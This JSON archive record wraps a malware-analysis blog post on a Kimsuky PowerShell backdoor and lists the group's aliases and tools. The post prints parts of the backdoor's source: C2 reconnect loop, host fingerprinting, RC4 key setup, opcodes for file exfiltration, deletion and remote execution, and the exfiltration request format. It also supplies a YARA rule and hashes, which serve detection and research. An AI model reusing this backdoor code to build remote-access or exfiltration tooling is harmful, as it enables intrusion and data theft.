{
	"id": "46ed74e2-3c84-47d2-bd30-a8dc6f58e8d7",
	"created_at": "2026-04-06T00:12:46.872347Z",
	"updated_at": "2026-04-10T03:37:40.61439Z",
	"deleted_at": null,
	"sha1_hash": "21ca33d4c54765a98ec61387615fe1f18c72c3b4",
	"title": "Kimsuky 2",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 495370,
	"plain_text": "Kimsuky 2\r\nPublished: 2024-03-09 · Archived: 2026-04-05 14:16:48 UTC\r\nIntroduction\r\nIn my previous blog post, I covered the analysis of a North Korean APT group called Kimsucky APT. We examined a malicious document that utilized a PowerShell script for the adversary's purposes. Let's revise some key points about Kimsucky:\r\nTargets: Primarily targets organizations in South Korea, Japan, and the United States.\r\nTechniques: Often uses malicious documents containing exploits or links to download malware that can steal data or provide remote access.\r\nTactics: Employs social engineering techniques (like spear phishing) and watering hole attacks to gain initial access to victim systems.\r\nI found this particular Kimsucky sample in the wild while doing my daily after-wake-up Bazaar browsing. Interestingly, the sample is very simple and will help people understand how PowerShell works. Unfortunately, the sample I found didn't have any connections: the C2's IP was missing from the script.\r\nPowerShell Analysis\r\nServer Connection\r\nEven though the script itself is not obfuscated or difficult to understand at all, it is very long, so we will analyse it part by part. We will start at the bottom of the script to understand the control flow.\r\n\r\n# Has 800 lines of code above it\r\nwhile( $true ) {\r\n $fContinue = CommunicationWithServer -StrIp \"127.0.0.1\" -UPort 8888;\r\n if( $fContinue -eq $false ) {\r\n Write-Host \"Server requests to close client.\";\r\n break;\r\n }\r\n Start-Sleep -Seconds 1;\r\n}\r\nRemoteFileManager\r\n\r\nhttps://somedieyoungzz.github.io/posts/kimsucky-2/\r\nPage 1 of 7\r\n\r\nThis code tries to connect to the remote server every second and keeps reconnecting indefinitely unless the server requests a disconnect. Here we see references to two functions, namely CommunicationWithServer and RemoteFileManager. Let's look at each of them.\r\nCommunicationWithServer\r\nThis function is really big, so we will divide it into small parts.\r\n\r\nFunction CommunicationWithServer\r\n{\r\n [CmdletBinding()]\r\n Param (\r\n [Parameter(Position = 0, Mandatory = $True)]\r\n [String] $StrIp,\r\n [Parameter(Position = 1, Mandatory = $True)]\r\n [uint16] $UPort\r\n )\r\n $Ip = [System.Net.Dns]::GetHostAddresses($strIp);\r\n $Address = [System.Net.IPAddress]::Parse($Ip);\r\n while($True)\r\n {\r\n try {\r\n $Socket = New-Object System.Net.Sockets.TcpClient($Address, $UPort);\r\n if($Socket.Connected) {\r\n break;\r\n }\r\n }\r\n catch {}\r\n Start-Sleep -Milliseconds 10000;\r\n }\r\n\r\nThis part does the same thing as the loop above it: it keeps retrying the TCP connection (sleeping 10 seconds between attempts) until one succeeds.\r\nUnique ID\r\n\r\n$SocketStream = $Socket.GetStream();\r\n\r\n #UniqueId Generate\r\n $HashObject = [Security.Cryptography.HashAlgorithm]::Create(\"MD5\");\r\n $EncObject = New-Object System.Text.UTF8Encoding;\r\n $Ipv4Address = GetIpv4Address;\r\n $MacAddress = GetMacAddress -Ipv4Address $Ipv4Address;\r\n $HashValue = $HashObject.ComputeHash($EncObject.GetBytes($MacAddress + $Ipv4Address));\r\n\r\n $StrTemp = [System.BitConverter]::ToString($HashValue);\r\n $StrUniqueId = RemoveHyphen -StrIn $StrTemp;\r\n $ByUniqueId = $EncObject.GetBytes($StrUniqueId);\r\n #RC4 Key Generate\r\n $SendKeyData = $EncObject.GetBytes($StrUniqueId + \"_r\");\r\n $RecvKeyData = $EncObject.GetBytes($StrUniqueId + \"_s\");\r\n $Global:SendKey = PrePare_Key -KeyData $SendKeyData;\r\n $Global:RecvKey = PrePare_Key -KeyData $RecvKeyData;\r\n #Send to Server OP_UNIQ_ID Message\r\n [uint16]$nOpCode = [_OP_CODE]::OP_UNIQ_ID;\r\n [uint32]$nUniqueIdLen = $ByUniqueId.Length;\r\n [uint32]$nDataLen = 4 + $nUniqueIdLen;\r\n $FirstPacket = New-Object System.Byte[](2 + 4 + $nDataLen);\r\n [Array]::Copy([BitConverter]::GetBytes($nOpCode), 0, $FirstPacket, 0, 2);\r\n [Array]::Copy([BitConverter]::GetBytes($nDataLen), 0, $FirstPacket, 2, 4);\r\n [Array]::Copy([BitConverter]::GetBytes($nUniqueIdLen), 0, $FirstPacket, 6, 4);\r\n [Array]::Copy($ByUniqueId, 0, $FirstPacket, 10, $nUniqueIdLen);\r\n $SocketStream.Write($FirstPacket, 0, $FirstPacket.Length);\r\n\r\nA socket stream is set up for the transfer of data.\r\nA parameter called Unique ID is generated as follows:\r\nAn MD5 hash object is created.\r\nThe IPv4 address and MAC address are concatenated together and hashed.\r\nThe hash is converted to a string, the hyphens are removed, and the result is stored in $StrUniqueId.\r\nRC4 keys are derived by appending \"_r\" to $StrUniqueId for the send (encryption) key and \"_s\" for the receive (decryption) key.\r\nThe keys are prepared and stored in global variables for encryption and decryption respectively.\r\nA structure for sending and receiving messages is defined here, and the message containing the unique ID is sent to the server over the socket stream.\r\nPacket Receiving\r\n\r\n#Receive Packets from Server and Send to Server Result.\r\n $ReadBuffer = New-Object Byte[] 4196;\r\n $ContinueFlag = $True;\r\n $ping_send = New-Object Byte[] 1;\r\n $Tick = 0;\r\n While($ContinueFlag)\r\n {\r\n Start-Sleep -Milliseconds 1;\r\n if( ($Tick -eq 0) -or ($API::GetTickCount() - $Tick -gt 1000) ) {\r\n try {\r\n $send_result = $Socket.Client.Send($ping_send);\r\n if( $send_result -eq 0 ) {\r\n Write-Host \"Disconnected from Server[1]!!!\";\r\n $ContinueFlag = $false;\r\n }\r\n } catch [Exception] {\r\n Write-Host \"Disconnected from Server[0]!!!\";\r\n $ContinueFlag = $false;\r\n }\r\n $Tick = $API::GetTickCount();\r\n }\r\n\r\nAs the name suggests, it continuously receives data from the server and sends a ping every second to keep the connection alive. If the ping fails, it closes the connection.\r\nRemoteFileManager\r\n\r\nFunction RemoteFileManager\r\n{\r\n Add-Type -TypeDefinition @\"\r\n using System;\r\nusing System.Diagnostics;\r\nusing System.Runtime.InteropServices;\r\nusing System.Security.Principal;\r\n [Flags]\r\n public enum _OP_CODE : ushort\r\n {\r\n OP_UNIQ_ID = 0x401,\r\n OP_REQ_DRIVE_LIST = 0x402,\r\n OP_RES_DRIVE_LIST = 0x403,\r\n OP_REQ_PATH_LIST = 0x404,\r\n OP_RES_PATH_LIST = 0x405,\r\n OP_REQ_PATH_DOWNLOAD = 0x406,\r\n OP_RES_PATH_DOWNLOAD = 0x407,\r\n OP_REQ_PATH_DELETE = 0x408,\r\n OP_RES_PATH_DELETE = 0x409,\r\n OP_REQ_FILE_UPLOAD = 0x40A,\r\n OP_RES_FILE_UPLOAD = 0x40B,\r\n OP_REQ_PATH_RENAME = 0x40C,\r\n OP_RES_PATH_RENAME = 0x40D,\r\n OP_REQ_CREATE_DIR = 0x40E,\r\n OP_RES_CREATE_DIR = 0x40F,\r\n OP_REQ_RESTART = 0x410,\r\n OP_REQ_CLOSE = 0x411,\r\n OP_REQ_REMOVE = 0x412,\r\n OP_RES_DRIVE_ERROR = 0x413,\r\n OP_REQ_EXECUTE = 0x414,\r\n OP_RES_EXECUTE = 0x415,\r\n OP_REQ_CREATE_ZIP = 0x416,\r\n OP_RES_CREATE_ZIP = 0x417\r\n }\r\n [StructLayout(LayoutKind.Sequential)]\r\n public struct _RC4_KEY\r\n {\r\n public Byte[] state;\r\n public Byte x;\r\n public Byte y;\r\n }\r\n\"@\r\n $signatures = @'\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern UInt32 GetTickCount();\r\n'@\r\n $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru\r\n $Global:SendKey = New-Object _RC4_KEY;\r\n $Global:RecvKey = New-Object _RC4_KEY;\r\n $Global:indexX = 0;\r\n $Global:indexY = 0;\r\n\r\nThis RemoteFileManager function starts with the Add-Type command, which lets you define new types dynamically in PowerShell. It can be used to create .NET classes and enum types. In our code it is composed of two elements:\r\n_OP_CODE - Each constant represents an operation code used in the communication protocol between the client and the server. An explanation of these enums is given below.\r\n\r\nOP_UNIQ_ID = 0x401, # Check-In Unique ID - Sent with first packet from Client\r\nOP_REQ_DRIVE_LIST = 0x402, # Request from Server for logical drive info\r\nOP_RES_DRIVE_LIST = 0x403, # Response from client with logical drive info\r\nOP_REQ_PATH_LIST = 0x404, # Request from Server for list of dir & files from path\r\nOP_RES_PATH_LIST = 0x405, # Response from client with list of dir, files from path\r\nOP_REQ_PATH_DOWNLOAD = 0x406, # Request from server to exfiltrate file/dir to the C2 - arg: file/dir_path;c2_url\r\nOP_RES_PATH_DOWNLOAD = 0x407, # Response from client once the file/dir (ZIP + b64 encoded) is exfiltrated to C2\r\nOP_REQ_PATH_DELETE = 0x408, # Request from server to delete dir/file - arg:path\r\nOP_RES_PATH_DELETE = 0x409, # Response from client after deleting dir/file\r\nOP_REQ_FILE_UPLOAD = 0x40A, # Request from server to upload file on the machine\r\nOP_RES_FILE_UPLOAD = 0x40B, # Response from client once the uploaded file is written on the machine\r\nOP_REQ_PATH_RENAME = 0x40C, # Request from server to rename file/folder - arg:oldfilename,newfilename\r\nOP_RES_PATH_RENAME = 0x40D, # Response from client after renaming file/folder\r\nOP_REQ_CREATE_DIR = 0x40E, # Request from server to create directory - arg: path - add (2) if already created\r\nOP_RES_CREATE_DIR = 0x40F, # Response from server after creating directory\r\nOP_REQ_RESTART = 0x410, # Restart connection\r\nOP_REQ_CLOSE = 0x411, # Close connection\r\nOP_REQ_REMOVE = 0x412, # Close connection\r\nOP_RES_DRIVE_ERROR = 0x413, # Sent from client: no drives found / no permissions / io error\r\nOP_REQ_EXECUTE = 0x414, # Request from Server to execute file/command - arg:path\r\nOP_RES_EXECUTE = 0x415, # Response from client after executing the file/command via IEX - uses OP_REQ_EXECUTE\r\nOP_REQ_CREATE_ZIP = 0x416, # Request from server to ZIP archive files/directory arg: path\r\nOP_RES_CREATE_ZIP = 0x417 # Response from server after ZIP archiving the files/directory - uses OP_REQ_CREATE_ZI\r\n\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern UInt32 GetTickCount();\r\n\r\nThis simply imports GetTickCount from kernel32.dll.\r\nRequest parameters to C2:\r\n\r\nPOST Request Body:\r\n - filename = ToBase64String(filename) | filename: file to be exfiltrated\r\n - Data: ToBase64String(file_contents) ; File contents of file to be exfiltrated\r\n\r\nC2 URL: C2_URL/show.php | C2_URL provided from the Server\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.\r\n\r\nWe've almost covered all the main functions of the backdoor script; some functions are left for your interpretation. This particular sample uses a technique called Compile After Delivery. You can read more at T1027.004. It uses csc.exe to compile the .NET code. This script is basically a backdoor used by the Kimsucky APT. I couldn't find the server-side code or the server anywhere. A Twitter user did post the server, which you can see below. If anyone finds the server, please let me know.\r\nYARA Rules\r\n\r\nrule Kimsucky_Backdoor{\r\n meta:\r\n description = \"Detects Kimsucky PowerShell backdoor script\"\r\n author = \"somedieyoungZZ\"\r\n strings:\r\n $sleep_function1 = \"Start-Sleep\" // Common sleep function\r\n $sleep_function2 = \"System.Threading.Thread.Sleep\" // Alternative sleep method\r\n $socket_creation1 = \"New-Object System.Net.Sockets.TcpClient\" // TCP socket creation\r\n $socket_creation2 = \"New-Object System.Net.Sockets.UdpClient\" // UDP socket creation\r\n $type_definition = \"Add-Type -TypeDefinition\" // Type definition marker\r\n $dll_import = \"[DllImport(\" // DllImport attribute start\r\n $remote_file_manager = \"RemoteFileManager\" // Target string\r\n condition:\r\n any of ($sleep_function*) and any of ($socket_creation*) and all of ($type_definition, $dll_import) and ($remote_file_ma\r\n}\r\n\r\nIndicators Of Compromise (IOC)\r\nMD5: c81ed44799aefb540123159618f7507c\r\nSHA-1: fd23177a4481f39fe53a306e2d7fe282cb30a87d\r\nSHA-256: 87b5a1f79a2be17401d8b2d354c61619ce6195b57e8a5183f78b98e233036062\r\nVirusTotal | ANY.RUN | Bazaar\r\nThank you for reading this till the end ❤\r\nDiscord: somedieyoungzz\r\nTwitter: https://twitter.com/IdaNotPro\r\nSource: https://somedieyoungzz.github.io/posts/kimsucky-2/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://somedieyoungzz.github.io/posts/kimsucky-2/"
	],
	"report_names": [
		"kimsucky-2"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434366,
	"ts_updated_at": 1775792260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/21ca33d4c54765a98ec61387615fe1f18c72c3b4.pdf",
		"text": "https://archive.orkl.eu/21ca33d4c54765a98ec61387615fe1f18c72c3b4.txt",
		"img": "https://archive.orkl.eu/21ca33d4c54765a98ec61387615fe1f18c72c3b4.jpg"
	}
}